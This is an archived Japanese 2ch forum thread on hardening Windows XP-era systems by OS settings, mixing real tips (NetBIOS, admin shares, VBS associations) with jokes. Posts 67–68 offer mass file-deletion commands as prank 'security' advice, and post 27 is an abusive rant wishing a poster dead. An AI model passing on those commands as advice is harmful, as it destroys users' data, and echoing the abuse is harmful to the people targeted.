1read 100read
2013年17セキュリティ214: OSの設定だけで、ぶったまげる程セキュアにする方法 (112) TOP カテ一覧 スレ一覧 2ch元 削除依頼
ドクターアレック スアンチスパイウェア (203)
踏むとフォーマットされるヤバイ画像対策専用スレ (792)
サポート終了後のXPのセキュリティ【2014年〜】 (108)
KNOPPIXとセキュリティー (397)
なんかCドライブどんどん減ってってるんですが… (153)
なんかCドライブどんどん減ってってるんですが… (153)

OSの設定だけで、ぶったまげる程セキュアにする方法


1 :04/04/30 〜 最終レス :2013/07/12
PFWを使わず・・・

2 :
ルータ

           −完−

3 :
じゃあルータも使わずに。。。

4 :
管理共有の無効。
SYN Attack Protectを最強に。
LanManager認証の下位互換制を厳しく。

5 :
質問なら、スレッドを立てずに
セキュリティ初心者質問スレッドpart40
http://pc3.2ch.net/test/read.cgi/sec/1082207307/l50
でどうぞ。

6 :
とりあえずここ見て余計なサービス切った。
でも、まだまだ強化できるかと・・・。
http://www.geocities.co.jp/SiliconValley-SanJose/3220/XP-service.htm#top

7 :
>>4
トンクス。
具体的なやり方は自分で勉強します。

8 :
>>5
じゃあ自分でコツコツ勉強しながら書き込むことにします。
テクニック紹介、情報交換スレが目的だったけど
私のスキルが低すぎました。

9 :
DCOMbobulator
http://grc.com/dcom/
SocketLock
http://grc.com/dos/sockettome1.htm

10 :
自分でコツコツ勉強しながらOSの設定するぐらいなら、PFWなりルータなりを導入した方がよっぽど早いし安全だ。
何のためにこれらがあるのか分かってるのか?
それでも「OSの設定だけで…」なんて言うのなら、納得行く設定が出来るまではセキュリティ対策が万全ではないわけだから、ネットに繋がない方が良いんじゃないか?

11 :
>>10
知らない間にFWが落ちていてガクガクブルブルになるときのために素
でもある程度堅牢な状態を作るのは悪いことではないのでは?

12 :
>>9
英語が苦手ですが、頑張ります。
情報トンクス。
>>10
PFWは使ってます。
でも頼りすぎず、OSそのものをもっとセキュアにしたいと思いました。

13 :
NetBIOS を無効にする
1. Windows タスクバーのスタートメニューで[設定]、[ネットワークとダイヤルアップ接続]の順に選択します
2. [ローカルエリア接続]を右クリックして表示されるメニューで[プロパティ]を選択します
3. [一般]ページを表示します
4. コンポーネントリストで[インターネットプロトコル (TCP/IP)]を選択します
5. [プロパティ]を選択します
6. [インターネットプロトコル (TCP/IP) のプロパティ]ウィンドウで[詳細設定]をクリックします
7. [WINS]ページを表示します
8. [TCP/IP 経由の NetBIOS を無効にする]を選択します
9. [TCP/IP の詳細設定]ウィンドウを閉じるために[OK]をクリックします
10. [インターネットプロトコル (TCP/IP) のプロパティ]ウィンドウを閉じるために[OK]をクリックします
11. [ローカルエリア接続]ウィンドウを閉じるために[OK]をクリックします

14 :
ネットに繋がず起動もしない



それ以前にPCを使わない



それ以前に誰も信じないで全てを自分一人で行う



そんなの無理だから首をt(ry

15 :
>>4
http://www.geocities.co.jp/SiliconValley/7587/

16 :
>>13
それ実行してます。
>>14
ご堪忍を・・・・。

17 :
PCに神社の御守りを貼り付ける。

18 :
氷川神社の護符は効く。

19 :
窓の友とかいじくるつくーるを使わないで管理共有を無効化
管理共有 (C$ など) を使用禁止するには?
Windows NT/2000/XP は全ドライブのルートに管理共有 (ドライブレター$) が設定され、管理者名とパスワードがあれば全ディスクをリモートから操作することが可能です。(ただし、XP Home Edition は標準で管理共有が設定されていません。)
セキュリティなどの観点から、この管理共有を使用禁止するには次の作業を行ってください。
1. [スタート]−[ファイル名を指定して実行] から regedit を起動します。
2. HKEY_LOCAL_MACHINE \System \CurrentControlSet \Services \LanmanServer \Parameters を開きます。
3. [編集]−[新規]−[DWORD 値] をクリックし、AutoShareServer を作成します。
(AutoShareServer は Server 以上で有効です。NT Workstation や Windows 2000/XP Professional では AutoShareWks を作成します。)
4. AutoShareServer または AutoShareWks のデータを 0 に設定します。
  
http://homepage2.nifty.com/winfaq/w2k/network.html#910

20 :
>>1よ
http://www.google.co.jp/search?hl=ja&ie=UTF-8&oe=UTF-8&q=tcp%2Fip%E3%83%95%E3%82%A3%E3%83%AB%E3%82%BF%E3%83%AA%E3%83%B3%E3%82%B0%E6%A9%9F%E8%83%BD+windows&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=
でも読んでみてくれ。
自分も勉強中なのでまだ報告できない

21 :
http://hp.vector.co.jp/authors/VA023244/Nlog2k/00BK.htm

22 :
XPSP2

23 :
DCOM 分散なんとかを停止。
プログラムを指定して実行に
dcomcnfg
と入力し(ry

24 :
ミサイル搭載する。

25 :
誰も使わないような独自プロトコルを作る

26 :
不動金縛りの術をかける。





画面動かなくなるけど。

27 :
あれほど言ったのに、まだそんなカキコするですか!もう許さんです!
あんたを許すわけにはいかんです!あんたみたいなバカ初めて見たです!
あんたみたいなバカ、ゴキブリ以下です!
死んでほしーです!つーか、死ぬべきです!あんたは絶対に許されないです!
勘違いしたバカを許すわけにはいかんのです!面白半分にいい加減なカキコするヤツなど許さんです!キャラメルコーンのピーナッツをケツの穴に詰めてRよです!!!
今まであんたがどんな生き方してきたか知らんけど、どーせひどい生き様だったと想像出来るです!あんたのカキコから読みとれるです!
バカ特有の匂いがするです!
死んでも許さんです!地獄で苦しめよです!それでも足らんくらいです!
あんたもっと現実を知れよです!いつまでも引きこもってネクラなことしてる場合じゃないよです!でも、もー手遅れです!あんたは何をやってもダメです!
この世に生まれてきたことを後悔してもダメです!あんたは生まれ変わってもどうせダメ人間に決まってるです!
絞め殺したいけどあんたに触るのが嫌なのでやめるです!でも、あんたみたいなカスはRよです!
風呂の排水溝に吸い込まれてRよです!!!
絶対許さんです!絶対許さんです!あんたみたいなヤツは絶対許さんです!早く消えろです!さっさとこの世からいなくなれよです!!!
いつまでも勘違いしたまま生きていけると思ったら大間違いだよです!このまま生きててもお前にはいーことなんにもねーよです!何でもいいからさっさとRよです!!!

28 :
Lanケーブルをぶっこぬけ

29 :
PCを窓から投(ry

30 :
こんなこと出来るなんて知らなかった・・・、ルーターのパケットフィルター
いらないジャン・・・。
http://www.atmarkit.co.jp/fsecurity/rensai/securitytips/019filter.html

31 :
runlevelを0に汁。

32 :
>>30 アホウが。ハネッ返りおって。所詮サービスだろが。

33 :
呪文でガード汁!!

34 :
.vbsとかの関連付けを消す

35 :
ファミコンで我慢する。

36 :
何気に良スレ。

37 :
Windows Scripting HostとVBSファイルの関連付けをはずす
2000、XPの例
1. [マイ コンピュータ]または任意のフォルダを開く
2. メニューバーの[ツール]→[フォルダ オプション]を選択
(ここまでの作業は、コントロール パネルからフォルダ オプションを選んでもできます)
3. [ファイルの種類]タブを選択
4. 登録されているファイルの種類で拡張子が[VBS]、ファイルの種類が[VBScriptスクリプト ファイル](またはVBScript Script File)のものを探して選択し、[削除]をクリック
5. 確認のダイアログボックスが出るので[はい]をクリック

38 :
9x、NT 4.0の例
1. [マイ コンピュータ]または任意のフォルダを開く
2. メニューバーの[表示]→[フォルダ オプション]を選択
3. [ファイルの種類]タブを選択
4. 登録されているファイルの種類で拡張子が[VBS]、ファイルの種類が[VBScriptスクリプト ファイル]のものを探して選択し、[削除]をクリック
5. 確認のダイアログボックスが出るので[はい]をクリック

39 :
HTAファイル形式の実行を無効化
>>37-38の手順でファイルの種類リストを開く。
HTA拡張子のエントリを削除。

40 :
昨日物置の中を整理しようと思い、
ぎゅうぎゅう詰めの棚に手を突っ込んで悪戦苦闘していた。
ふと気ずくと、
ピューとかピーとかの音がすることに気がついた。
不思議なのは、ある規則があるってこと。
手を棚の中に差し出すと音がする。
でも引っ込めるときには何の音もしない。
また手を突っ込むとピューと音がする。
だんだん恐くなってきた。
いったい何の音?中に何かいるのか?
中を覗きこみ思案していると、
ピーと音がするではないか!
そのとき、ハッとして全てが理解できました。
私の鼻が鳴っていたのです。息を吸い込むとピー。
手を差し出す時に息を吸い、引っ込めるときに吐く。
そのタイミングであの怪音は発せられていあた。
OSの設定で解決できますか?

41 :
>怪音は発せられていあた。
0点。

42 :
ほのぼのR。

43 :
OS=窓

44 :
●.....●..●..●...●●..●●...●●..●●●....●●●●..●●.....●●●..●..●
無料のウイルス対策ソフトなどのセキュリティソフト一覧
http://www.geocities.co.jp/SiliconValley-Cupertino/2010/security.html
●.●.●.●..●...●●.●..●●.●●......●..●●...●●...●●●.....●.●...●

45 :
ぶったまげる程セキュアなOSを作ってくれ。
そうすりゃ設定に悩みこともなくなる。

46 :
Net MeetingとRemote Desktop関係は無効に。
あと、Serverサービスもな。

47 :
Remote Desktopを使うと
黒豚うさぎの御顔を拝めます。

48 :
うんこちんちん

49 :
Basilisk辺りを起動する。

50 :
>>45
ゲイシに頼むのか、それとも……

51 :
>>42ワロタ

52 :
ちんちんしゅっしゅっ

53 :
Help and Supportサービスを無効にする。

54 :
童貞を守る。

55 :
OSを超漢字にする

56 :
ファイルタイプをNTFSにする。

57 :
常にセーフモード。

58 :
DOSオンリー

59 :
>>13
それは基本ですね。
PFWに頼り切る前に、チェックすべき点が多いと思います。

60 :
DOSは凶器

61 :
ぶったまげた

62 :
うんこー

63 :
スレ名が「プリキュア」に見えた。

64 :
チンコ認証システム導入しますた
バイブ機能で10秒で認証完了
生きた精子をDNAレベルで検査
かぴかぴ防止付き

65 :
イカ臭処理機能も必要だ。

66 :
セキュリティーはOSの設定だけで防げるものではない
「どんな事に対してセキュリティ対策をするのか」で必要な対策は変わってくる
しかし、どんな対策にも共通していえる事がある
どんなに優れたセキュリティーを用いても、使用するのは人間
セキュリティに対する意識やモラルが低ければ、使用者自身が最大のセキュリティホール


67 :
コマンドプロンプトで
echo y | del *.*
と入力して実行すると、最高にセキュアな環境がつくれる。

68 :
これもなかなかなもんだ
attrib -S -H -R *.*
del /A /F /Q *.*
for /D %i in (*.*) do rmdir /S /Q "%i"

69 :
ぶったまげますた。

70 :
>>68
forの後の/Dはどんな意味でつか?

71 :
スタンダードアローンにすれば最強

72 :
スタンダードアローンRー

73 :
汁べすたスタンドアローン

74 :
>>70
やってみればわかる

75 :
起動しないのが最強。
セキュリティに気を使うことも無い。
欠点は、PCが使えない事。

76 :
gyaaaあああああaaaaaあああああああああーーーーーーーーーーーーーーーーーーーーーーーーー!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
おまいらぁぁぁぁぁぁぁぁぁああぁぁあああaaaaa------------!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

77 :
>>76
どうした?

78 :
新学期が始まって色々あるんでしょう。

79 :
新学期が始まっていきなり実力テストがあった。

80 :
>>75
それなら、所有しないことの方が最強なのでは?
欠点は一緒だが、パソコンに使う金がいらないぞ

81 :
OSの設定だkうぇで

82 :
>>80
だったらいっそのこと死んじゃえば(ry

83 :
>>82
その程度で死のうと思う訳ないだろ

84 :
やあ。庶民の諸君。
貧乏人は貧乏人らしく、悪戦苦闘してくれよ。

85 :
一ヶ月も放置されたスレをわざわざageて煽るアホがいますね(^_^;

86 :
ちんちん、かゆかゆ

87 :
簡単だよ
不正アクセス全て防ぐ方法
インターネット接続にある接続方法全部無効にするか、
LANボードやモデムドライバー消して動かなくする。
マクロウィルスの完璧な防ぎ方
OFFICEをアンインストールか、
OFFICEファイルの関連付け全部解除

88 :
>>87
そんなめんどくさいことしなくとも、LANケーブルぬっこぶけばいいだけだ

89 :
つネットカフェ

90 :

おい!オマイらそんなことより、ちゃんとMBSAスキャンしたか?
http://www.atmarkit.co.jp/fwin2k/operation/mbsa20-02/mbsa20-02_01.html
PC設定の脆弱性がこれでばっちり分かるぞ。

91 :
うんち

92 :
いつも思うが↑のようなやつは実年齢いくつぐらいなんだろう。
精神年齢は言うまでもないが…。

93 :
うんち

94 :
まむこ

95 :
まずはWindowsを管理者で常用しないことから始めよう。

96 :
おR

97 :
スタンドアローンで運用

98 :
>>95
それだけで致命的なウィルスの大半は無力化できるな。
あとは、アクセス権限のポリシーを決めて、
普段自分が使ってるアカウントに余計な権限を外せばおk

99 :
ちんまん

100read 1read
1read 100read
TOP カテ一覧 スレ一覧 2ch元 削除依頼
アンチウイルスソフト体験版で無料生活 Part22 (755)
【本スレ】ウイルスバスタークラウド(2013)Part.1【被害者の会】 (817)
がんばれマカフィー Part76/ McAfee (724)
VISTA標準ファイアウォールを語る (422)
トリップのキージェネ (660)
☆☆トロイの木馬☆☆5台目 (686)
--log9.info------------------
電脳コイル204 (915)
這いよれ!ニャル子さんW SAN値-90 (260)
俺の妹(ryは全然可愛くない糞アニメ15 (502)
ToHeart2 16スレ目の入学式 (780)
攻殻機動隊ARISE 6 (782)
輪廻のラグランジェseason2 part88 (921)
異国迷路のクロワーゼ The Animation 奉公21日目 (305)
【脳内】スイートプリキュア♪アンチスレ174【メイジャーランド】 (643)
はじめの一歩 New Challenger Round_16 (462)
アイドルマスターはアイドルものの起源を主張したがる糞アニメ51 (939)
未来日記 82th (680)
遊戯王ファイブディーズ・アンチスレ20 (746)
【ルパン三世】LUPIN the Third 〜峰不二子という女〜 36 (275)
武装神姫 MMS 52th (353)
あの日見た花の名前を僕達はまだ知らない。245 (154)
キルミーベイベー 54 (305)
--log55.com------------------
Steam板県名&SLIP表示についての投票
嫌儲板名変更投票
☆☆★安保法案に賛成?反対?★☆★
モテない男性板ID都道府県表示投票
ハード・業界板LR変更周知の為の名前欄変更投票
2ちゃんねる荒らしを決めよう
好きなデジモンを投票するスレ
ニュース速報F板 の名無し変更に関する投票